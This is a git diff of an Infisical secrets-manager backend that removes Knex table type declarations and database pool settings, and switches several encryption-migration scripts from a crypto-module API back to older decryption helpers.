assumePrivileges: TAssumePrivilegeServiceFactory;
|
||||
githubOrgSync: TGithubOrgSyncServiceFactory;
|
||||
folderCommit: TFolderCommitServiceFactory;
|
||||
pit: TPitServiceFactory;
|
||||
secretScanningV2: TSecretScanningV2ServiceFactory;
|
||||
internalCertificateAuthority: TInternalCertificateAuthorityServiceFactory;
|
||||
pkiTemplate: TPkiTemplatesServiceFactory;
|
||||
};
|
||||
// this is exclusive use for middlewares in which we need to inject data
|
||||
// everywhere else access using service layer
|
||||
|
121
backend/src/@types/knex.d.ts
vendored
121
backend/src/@types/knex.d.ts
vendored
@ -6,9 +6,6 @@ import {
|
||||
TAccessApprovalPoliciesApprovers,
|
||||
TAccessApprovalPoliciesApproversInsert,
|
||||
TAccessApprovalPoliciesApproversUpdate,
|
||||
TAccessApprovalPoliciesBypassers,
|
||||
TAccessApprovalPoliciesBypassersInsert,
|
||||
TAccessApprovalPoliciesBypassersUpdate,
|
||||
TAccessApprovalPoliciesInsert,
|
||||
TAccessApprovalPoliciesUpdate,
|
||||
TAccessApprovalRequests,
|
||||
@ -80,24 +77,6 @@ import {
|
||||
TExternalKms,
|
||||
TExternalKmsInsert,
|
||||
TExternalKmsUpdate,
|
||||
TFolderCheckpointResources,
|
||||
TFolderCheckpointResourcesInsert,
|
||||
TFolderCheckpointResourcesUpdate,
|
||||
TFolderCheckpoints,
|
||||
TFolderCheckpointsInsert,
|
||||
TFolderCheckpointsUpdate,
|
||||
TFolderCommitChanges,
|
||||
TFolderCommitChangesInsert,
|
||||
TFolderCommitChangesUpdate,
|
||||
TFolderCommits,
|
||||
TFolderCommitsInsert,
|
||||
TFolderCommitsUpdate,
|
||||
TFolderTreeCheckpointResources,
|
||||
TFolderTreeCheckpointResourcesInsert,
|
||||
TFolderTreeCheckpointResourcesUpdate,
|
||||
TFolderTreeCheckpoints,
|
||||
TFolderTreeCheckpointsInsert,
|
||||
TFolderTreeCheckpointsUpdate,
|
||||
TGateways,
|
||||
TGatewaysInsert,
|
||||
TGatewaysUpdate,
|
||||
@ -125,9 +104,6 @@ import {
|
||||
TIdentityAccessTokens,
|
||||
TIdentityAccessTokensInsert,
|
||||
TIdentityAccessTokensUpdate,
|
||||
TIdentityAlicloudAuths,
|
||||
TIdentityAlicloudAuthsInsert,
|
||||
TIdentityAlicloudAuthsUpdate,
|
||||
TIdentityAwsAuths,
|
||||
TIdentityAwsAuthsInsert,
|
||||
TIdentityAwsAuthsUpdate,
|
||||
@ -164,9 +140,6 @@ import {
|
||||
TIdentityProjectMemberships,
|
||||
TIdentityProjectMembershipsInsert,
|
||||
TIdentityProjectMembershipsUpdate,
|
||||
TIdentityTlsCertAuths,
|
||||
TIdentityTlsCertAuthsInsert,
|
||||
TIdentityTlsCertAuthsUpdate,
|
||||
TIdentityTokenAuths,
|
||||
TIdentityTokenAuthsInsert,
|
||||
TIdentityTokenAuthsUpdate,
|
||||
@ -303,9 +276,6 @@ import {
|
||||
TSecretApprovalPoliciesApprovers,
|
||||
TSecretApprovalPoliciesApproversInsert,
|
||||
TSecretApprovalPoliciesApproversUpdate,
|
||||
TSecretApprovalPoliciesBypassers,
|
||||
TSecretApprovalPoliciesBypassersInsert,
|
||||
TSecretApprovalPoliciesBypassersUpdate,
|
||||
TSecretApprovalPoliciesInsert,
|
||||
TSecretApprovalPoliciesUpdate,
|
||||
TSecretApprovalRequests,
|
||||
@ -360,24 +330,9 @@ import {
|
||||
TSecretRotationV2SecretMappingsInsert,
|
||||
TSecretRotationV2SecretMappingsUpdate,
|
||||
TSecrets,
|
||||
TSecretScanningConfigs,
|
||||
TSecretScanningConfigsInsert,
|
||||
TSecretScanningConfigsUpdate,
|
||||
TSecretScanningDataSources,
|
||||
TSecretScanningDataSourcesInsert,
|
||||
TSecretScanningDataSourcesUpdate,
|
||||
TSecretScanningFindings,
|
||||
TSecretScanningFindingsInsert,
|
||||
TSecretScanningFindingsUpdate,
|
||||
TSecretScanningGitRisks,
|
||||
TSecretScanningGitRisksInsert,
|
||||
TSecretScanningGitRisksUpdate,
|
||||
TSecretScanningResources,
|
||||
TSecretScanningResourcesInsert,
|
||||
TSecretScanningResourcesUpdate,
|
||||
TSecretScanningScans,
|
||||
TSecretScanningScansInsert,
|
||||
TSecretScanningScansUpdate,
|
||||
TSecretSharing,
|
||||
TSecretSharingInsert,
|
||||
TSecretSharingUpdate,
|
||||
@ -792,16 +747,6 @@ declare module "knex/types/tables" {
|
||||
TIdentityGcpAuthsInsert,
|
||||
TIdentityGcpAuthsUpdate
|
||||
>;
|
||||
[TableName.IdentityAliCloudAuth]: KnexOriginal.CompositeTableType<
|
||||
TIdentityAlicloudAuths,
|
||||
TIdentityAlicloudAuthsInsert,
|
||||
TIdentityAlicloudAuthsUpdate
|
||||
>;
|
||||
[TableName.IdentityTlsCertAuth]: KnexOriginal.CompositeTableType<
|
||||
TIdentityTlsCertAuths,
|
||||
TIdentityTlsCertAuthsInsert,
|
||||
TIdentityTlsCertAuthsUpdate
|
||||
>;
|
||||
[TableName.IdentityAwsAuth]: KnexOriginal.CompositeTableType<
|
||||
TIdentityAwsAuths,
|
||||
TIdentityAwsAuthsInsert,
|
||||
@ -875,12 +820,6 @@ declare module "knex/types/tables" {
|
||||
TAccessApprovalPoliciesApproversUpdate
|
||||
>;
|
||||
|
||||
[TableName.AccessApprovalPolicyBypasser]: KnexOriginal.CompositeTableType<
|
||||
TAccessApprovalPoliciesBypassers,
|
||||
TAccessApprovalPoliciesBypassersInsert,
|
||||
TAccessApprovalPoliciesBypassersUpdate
|
||||
>;
|
||||
|
||||
[TableName.AccessApprovalRequest]: KnexOriginal.CompositeTableType<
|
||||
TAccessApprovalRequests,
|
||||
TAccessApprovalRequestsInsert,
|
||||
@ -904,11 +843,6 @@ declare module "knex/types/tables" {
|
||||
TSecretApprovalPoliciesApproversInsert,
|
||||
TSecretApprovalPoliciesApproversUpdate
|
||||
>;
|
||||
[TableName.SecretApprovalPolicyBypasser]: KnexOriginal.CompositeTableType<
|
||||
TSecretApprovalPoliciesBypassers,
|
||||
TSecretApprovalPoliciesBypassersInsert,
|
||||
TSecretApprovalPoliciesBypassersUpdate
|
||||
>;
|
||||
[TableName.SecretApprovalRequest]: KnexOriginal.CompositeTableType<
|
||||
TSecretApprovalRequests,
|
||||
TSecretApprovalRequestsInsert,
|
||||
@ -1156,60 +1090,5 @@ declare module "knex/types/tables" {
|
||||
TGithubOrgSyncConfigsInsert,
|
||||
TGithubOrgSyncConfigsUpdate
|
||||
>;
|
||||
[TableName.FolderCommit]: KnexOriginal.CompositeTableType<
|
||||
TFolderCommits,
|
||||
TFolderCommitsInsert,
|
||||
TFolderCommitsUpdate
|
||||
>;
|
||||
[TableName.FolderCommitChanges]: KnexOriginal.CompositeTableType<
|
||||
TFolderCommitChanges,
|
||||
TFolderCommitChangesInsert,
|
||||
TFolderCommitChangesUpdate
|
||||
>;
|
||||
[TableName.FolderCheckpoint]: KnexOriginal.CompositeTableType<
|
||||
TFolderCheckpoints,
|
||||
TFolderCheckpointsInsert,
|
||||
TFolderCheckpointsUpdate
|
||||
>;
|
||||
[TableName.FolderCheckpointResources]: KnexOriginal.CompositeTableType<
|
||||
TFolderCheckpointResources,
|
||||
TFolderCheckpointResourcesInsert,
|
||||
TFolderCheckpointResourcesUpdate
|
||||
>;
|
||||
[TableName.FolderTreeCheckpoint]: KnexOriginal.CompositeTableType<
|
||||
TFolderTreeCheckpoints,
|
||||
TFolderTreeCheckpointsInsert,
|
||||
TFolderTreeCheckpointsUpdate
|
||||
>;
|
||||
[TableName.FolderTreeCheckpointResources]: KnexOriginal.CompositeTableType<
|
||||
TFolderTreeCheckpointResources,
|
||||
TFolderTreeCheckpointResourcesInsert,
|
||||
TFolderTreeCheckpointResourcesUpdate
|
||||
>;
|
||||
[TableName.SecretScanningDataSource]: KnexOriginal.CompositeTableType<
|
||||
TSecretScanningDataSources,
|
||||
TSecretScanningDataSourcesInsert,
|
||||
TSecretScanningDataSourcesUpdate
|
||||
>;
|
||||
[TableName.SecretScanningResource]: KnexOriginal.CompositeTableType<
|
||||
TSecretScanningResources,
|
||||
TSecretScanningResourcesInsert,
|
||||
TSecretScanningResourcesUpdate
|
||||
>;
|
||||
[TableName.SecretScanningScan]: KnexOriginal.CompositeTableType<
|
||||
TSecretScanningScans,
|
||||
TSecretScanningScansInsert,
|
||||
TSecretScanningScansUpdate
|
||||
>;
|
||||
[TableName.SecretScanningFinding]: KnexOriginal.CompositeTableType<
|
||||
TSecretScanningFindings,
|
||||
TSecretScanningFindingsInsert,
|
||||
TSecretScanningFindingsUpdate
|
||||
>;
|
||||
[TableName.SecretScanningConfig]: KnexOriginal.CompositeTableType<
|
||||
TSecretScanningConfigs,
|
||||
TSecretScanningConfigsInsert,
|
||||
TSecretScanningConfigsUpdate
|
||||
>;
|
||||
}
|
||||
}
|
||||
|
@ -1,6 +1,6 @@
|
||||
import knex, { Knex } from "knex";
|
||||
|
||||
export type TDbClient = Knex;
|
||||
export type TDbClient = ReturnType<typeof initDbConnection>;
|
||||
export const initDbConnection = ({
|
||||
dbConnectionUri,
|
||||
dbRootCert,
|
||||
@ -50,8 +50,6 @@ export const initDbConnection = ({
|
||||
}
|
||||
: false
|
||||
},
|
||||
// https://knexjs.org/guide/#pool
|
||||
pool: { min: 0, max: 10 },
|
||||
migrations: {
|
||||
tableName: "infisical_migrations"
|
||||
}
|
||||
@ -72,8 +70,7 @@ export const initDbConnection = ({
|
||||
},
|
||||
migrations: {
|
||||
tableName: "infisical_migrations"
|
||||
},
|
||||
pool: { min: 0, max: 10 }
|
||||
}
|
||||
});
|
||||
});
|
||||
|
||||
@ -110,8 +107,7 @@ export const initAuditLogDbConnection = ({
|
||||
},
|
||||
migrations: {
|
||||
tableName: "infisical_migrations"
|
||||
},
|
||||
pool: { min: 0, max: 10 }
|
||||
}
|
||||
});
|
||||
|
||||
// we add these overrides so that auditLogDb and the primary DB are interchangeable
|
||||
|
@ -4,7 +4,6 @@ import "ts-node/register";
|
||||
import dotenv from "dotenv";
|
||||
import type { Knex } from "knex";
|
||||
import path from "path";
|
||||
import { initLogger } from "@app/lib/logger";
|
||||
|
||||
// Update with your config settings. .
|
||||
dotenv.config({
|
||||
@ -14,8 +13,6 @@ dotenv.config({
|
||||
path: path.join(__dirname, "../../../.env")
|
||||
});
|
||||
|
||||
initLogger();
|
||||
|
||||
export default {
|
||||
development: {
|
||||
client: "postgres",
|
||||
|
@ -1,10 +1,9 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { inMemoryKeyStore } from "@app/keystore/memory";
|
||||
import { crypto } from "@app/lib/crypto/cryptography";
|
||||
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
|
||||
import { initLogger } from "@app/lib/logger";
|
||||
import { KmsDataKey } from "@app/services/kms/kms-types";
|
||||
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
import { SecretKeyEncoding, TableName } from "../schemas";
|
||||
import { getMigrationEnvConfig } from "./utils/env-config";
|
||||
@ -27,12 +26,9 @@ export async function up(knex: Knex): Promise<void> {
|
||||
}
|
||||
|
||||
initLogger();
|
||||
const superAdminDAL = superAdminDALFactory(knex);
|
||||
const envConfig = await getMigrationEnvConfig(superAdminDAL);
|
||||
|
||||
const envConfig = getMigrationEnvConfig();
|
||||
const keyStore = inMemoryKeyStore();
|
||||
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
|
||||
|
||||
const projectEncryptionRingBuffer =
|
||||
createCircularCache<Awaited<ReturnType<(typeof kmsService)["createCipherPairWithDataKey"]>>>(25);
|
||||
const webhooks = await knex(TableName.Webhook)
|
||||
@ -69,15 +65,12 @@ export async function up(knex: Knex): Promise<void> {
|
||||
|
||||
let encryptedSecretKey = null;
|
||||
if (el.encryptedSecretKey && el.iv && el.tag && el.keyEncoding) {
|
||||
const decyptedSecretKey = crypto
|
||||
.encryption()
|
||||
.symmetric()
|
||||
.decryptWithRootEncryptionKey({
|
||||
keyEncoding: el.keyEncoding as SecretKeyEncoding,
|
||||
iv: el.iv,
|
||||
tag: el.tag,
|
||||
ciphertext: el.encryptedSecretKey
|
||||
});
|
||||
const decyptedSecretKey = infisicalSymmetricDecrypt({
|
||||
keyEncoding: el.keyEncoding as SecretKeyEncoding,
|
||||
iv: el.iv,
|
||||
tag: el.tag,
|
||||
ciphertext: el.encryptedSecretKey
|
||||
});
|
||||
encryptedSecretKey = projectKmsService.encryptor({
|
||||
plainText: Buffer.from(decyptedSecretKey, "utf8")
|
||||
}).cipherTextBlob;
|
||||
@ -85,15 +78,12 @@ export async function up(knex: Knex): Promise<void> {
|
||||
|
||||
const decryptedUrl =
|
||||
el.urlIV && el.urlTag && el.urlCipherText && el.keyEncoding
|
||||
? crypto
|
||||
.encryption()
|
||||
.symmetric()
|
||||
.decryptWithRootEncryptionKey({
|
||||
keyEncoding: el.keyEncoding as SecretKeyEncoding,
|
||||
iv: el.urlIV,
|
||||
tag: el.urlTag,
|
||||
ciphertext: el.urlCipherText
|
||||
})
|
||||
? infisicalSymmetricDecrypt({
|
||||
keyEncoding: el.keyEncoding as SecretKeyEncoding,
|
||||
iv: el.urlIV,
|
||||
tag: el.urlTag,
|
||||
ciphertext: el.urlCipherText
|
||||
})
|
||||
: null;
|
||||
|
||||
const encryptedUrl = projectKmsService.encryptor({
|
||||
|
@ -1,11 +1,10 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { inMemoryKeyStore } from "@app/keystore/memory";
|
||||
import { crypto } from "@app/lib/crypto/cryptography";
|
||||
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
import { initLogger } from "@app/lib/logger";
|
||||
import { KmsDataKey } from "@app/services/kms/kms-types";
|
||||
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
import { SecretKeyEncoding, TableName } from "../schemas";
|
||||
import { getMigrationEnvConfig } from "./utils/env-config";
|
||||
@ -30,9 +29,7 @@ export async function up(knex: Knex): Promise<void> {
|
||||
}
|
||||
|
||||
initLogger();
|
||||
const superAdminDAL = superAdminDALFactory(knex);
|
||||
const envConfig = await getMigrationEnvConfig(superAdminDAL);
|
||||
|
||||
const envConfig = getMigrationEnvConfig();
|
||||
const keyStore = inMemoryKeyStore();
|
||||
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
|
||||
const projectEncryptionRingBuffer =
|
||||
@ -63,23 +60,20 @@ export async function up(knex: Knex): Promise<void> {
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.inputIV && el.inputTag && el.inputCiphertext && el.keyEncoding
|
||||
? crypto
|
||||
.encryption()
|
||||
.symmetric()
|
||||
.decryptWithRootEncryptionKey({
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
keyEncoding: el.keyEncoding as SecretKeyEncoding,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.inputIV,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
tag: el.inputTag,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
ciphertext: el.inputCiphertext
|
||||
})
|
||||
? infisicalSymmetricDecrypt({
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
keyEncoding: el.keyEncoding as SecretKeyEncoding,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.inputIV,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
tag: el.inputTag,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
ciphertext: el.inputCiphertext
|
||||
})
|
||||
: "";
|
||||
|
||||
const encryptedInput = projectKmsService.encryptor({
|
||||
|
@ -1,11 +1,10 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { inMemoryKeyStore } from "@app/keystore/memory";
|
||||
import { crypto } from "@app/lib/crypto/cryptography";
|
||||
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
import { initLogger } from "@app/lib/logger";
|
||||
import { KmsDataKey } from "@app/services/kms/kms-types";
|
||||
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
import { SecretKeyEncoding, TableName } from "../schemas";
|
||||
import { getMigrationEnvConfig } from "./utils/env-config";
|
||||
@ -24,9 +23,7 @@ export async function up(knex: Knex): Promise<void> {
|
||||
}
|
||||
|
||||
initLogger();
|
||||
const superAdminDAL = superAdminDALFactory(knex);
|
||||
const envConfig = await getMigrationEnvConfig(superAdminDAL);
|
||||
|
||||
const envConfig = getMigrationEnvConfig();
|
||||
const keyStore = inMemoryKeyStore();
|
||||
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
|
||||
const projectEncryptionRingBuffer =
|
||||
@ -56,23 +53,20 @@ export async function up(knex: Knex): Promise<void> {
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedDataTag && el.encryptedDataIV && el.encryptedData && el.keyEncoding
|
||||
? crypto
|
||||
.encryption()
|
||||
.symmetric()
|
||||
.decryptWithRootEncryptionKey({
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
keyEncoding: el.keyEncoding as SecretKeyEncoding,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.encryptedDataIV,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
tag: el.encryptedDataTag,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
ciphertext: el.encryptedData
|
||||
})
|
||||
? infisicalSymmetricDecrypt({
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
keyEncoding: el.keyEncoding as SecretKeyEncoding,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.encryptedDataIV,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
tag: el.encryptedDataTag,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
ciphertext: el.encryptedData
|
||||
})
|
||||
: "";
|
||||
|
||||
const encryptedRotationData = projectKmsService.encryptor({
|
||||
|
@ -1,11 +1,10 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { inMemoryKeyStore } from "@app/keystore/memory";
|
||||
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
|
||||
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
import { initLogger } from "@app/lib/logger";
|
||||
import { KmsDataKey } from "@app/services/kms/kms-types";
|
||||
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
|
||||
import { getMigrationEnvConfig } from "./utils/env-config";
|
||||
@ -55,9 +54,7 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
|
||||
}
|
||||
|
||||
initLogger();
|
||||
const superAdminDAL = superAdminDALFactory(knex);
|
||||
const envConfig = await getMigrationEnvConfig(superAdminDAL);
|
||||
|
||||
const envConfig = getMigrationEnvConfig();
|
||||
const keyStore = inMemoryKeyStore();
|
||||
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
|
||||
const orgEncryptionRingBuffer =
|
||||
@ -102,23 +99,19 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
|
||||
orgEncryptionRingBuffer.push(orgId, orgKmsService);
|
||||
}
|
||||
|
||||
const key = crypto
|
||||
.encryption()
|
||||
.symmetric()
|
||||
.decryptWithRootEncryptionKey({
|
||||
ciphertext: encryptedSymmetricKey,
|
||||
iv: symmetricKeyIV,
|
||||
tag: symmetricKeyTag,
|
||||
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
|
||||
});
|
||||
const key = infisicalSymmetricDecrypt({
|
||||
ciphertext: encryptedSymmetricKey,
|
||||
iv: symmetricKeyIV,
|
||||
tag: symmetricKeyTag,
|
||||
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
|
||||
});
|
||||
|
||||
const decryptedTokenReviewerJwt =
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedTokenReviewerJwt && el.tokenReviewerJwtIV && el.tokenReviewerJwtTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.tokenReviewerJwtIV,
|
||||
@ -135,9 +128,8 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedCaCert && el.caCertIV && el.caCertTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.caCertIV,
|
||||
|
@ -1,11 +1,10 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { inMemoryKeyStore } from "@app/keystore/memory";
|
||||
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
|
||||
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
import { initLogger } from "@app/lib/logger";
|
||||
import { KmsDataKey } from "@app/services/kms/kms-types";
|
||||
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
|
||||
import { getMigrationEnvConfig } from "./utils/env-config";
|
||||
@ -35,9 +34,7 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
|
||||
}
|
||||
|
||||
initLogger();
|
||||
const superAdminDAL = superAdminDALFactory(knex);
|
||||
const envConfig = await getMigrationEnvConfig(superAdminDAL);
|
||||
|
||||
const envConfig = getMigrationEnvConfig();
|
||||
const keyStore = inMemoryKeyStore();
|
||||
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
|
||||
const orgEncryptionRingBuffer =
|
||||
@ -74,24 +71,19 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
|
||||
);
|
||||
orgEncryptionRingBuffer.push(orgId, orgKmsService);
|
||||
}
|
||||
|
||||
const key = crypto
|
||||
.encryption()
|
||||
.symmetric()
|
||||
.decryptWithRootEncryptionKey({
|
||||
ciphertext: encryptedSymmetricKey,
|
||||
iv: symmetricKeyIV,
|
||||
tag: symmetricKeyTag,
|
||||
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
|
||||
});
|
||||
const key = infisicalSymmetricDecrypt({
|
||||
ciphertext: encryptedSymmetricKey,
|
||||
iv: symmetricKeyIV,
|
||||
tag: symmetricKeyTag,
|
||||
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
|
||||
});
|
||||
|
||||
const decryptedCertificate =
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedCaCert && el.caCertIV && el.caCertTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.caCertIV,
|
||||
|
@ -1,11 +1,10 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { inMemoryKeyStore } from "@app/keystore/memory";
|
||||
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
|
||||
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
import { initLogger } from "@app/lib/logger";
|
||||
import { KmsDataKey } from "@app/services/kms/kms-types";
|
||||
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
import { SecretKeyEncoding, TableName } from "../schemas";
|
||||
import { getMigrationEnvConfig } from "./utils/env-config";
|
||||
@ -28,8 +27,7 @@ const reencryptSamlConfig = async (knex: Knex) => {
|
||||
}
|
||||
|
||||
initLogger();
|
||||
const superAdminDAL = superAdminDALFactory(knex);
|
||||
const envConfig = await getMigrationEnvConfig(superAdminDAL);
|
||||
const envConfig = getMigrationEnvConfig();
|
||||
const keyStore = inMemoryKeyStore();
|
||||
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
|
||||
const orgEncryptionRingBuffer =
|
||||
@ -60,24 +58,19 @@ const reencryptSamlConfig = async (knex: Knex) => {
|
||||
);
|
||||
orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
|
||||
}
|
||||
|
||||
const key = crypto
|
||||
.encryption()
|
||||
.symmetric()
|
||||
.decryptWithRootEncryptionKey({
|
||||
ciphertext: encryptedSymmetricKey,
|
||||
iv: symmetricKeyIV,
|
||||
tag: symmetricKeyTag,
|
||||
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
|
||||
});
|
||||
const key = infisicalSymmetricDecrypt({
|
||||
ciphertext: encryptedSymmetricKey,
|
||||
iv: symmetricKeyIV,
|
||||
tag: symmetricKeyTag,
|
||||
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
|
||||
});
|
||||
|
||||
const decryptedEntryPoint =
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedEntryPoint && el.entryPointIV && el.entryPointTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.entryPointIV,
|
||||
@ -94,9 +87,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedIssuer && el.issuerIV && el.issuerTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.issuerIV,
|
||||
@ -113,9 +105,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedCert && el.certIV && el.certTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.certIV,
|
||||
@ -194,8 +185,7 @@ const reencryptLdapConfig = async (knex: Knex) => {
|
||||
}
|
||||
|
||||
initLogger();
|
||||
const superAdminDAL = superAdminDALFactory(knex);
|
||||
const envConfig = await getMigrationEnvConfig(superAdminDAL);
|
||||
const envConfig = getMigrationEnvConfig();
|
||||
const keyStore = inMemoryKeyStore();
|
||||
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
|
||||
const orgEncryptionRingBuffer =
|
||||
@ -226,24 +216,19 @@ const reencryptLdapConfig = async (knex: Knex) => {
|
||||
);
|
||||
orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
|
||||
}
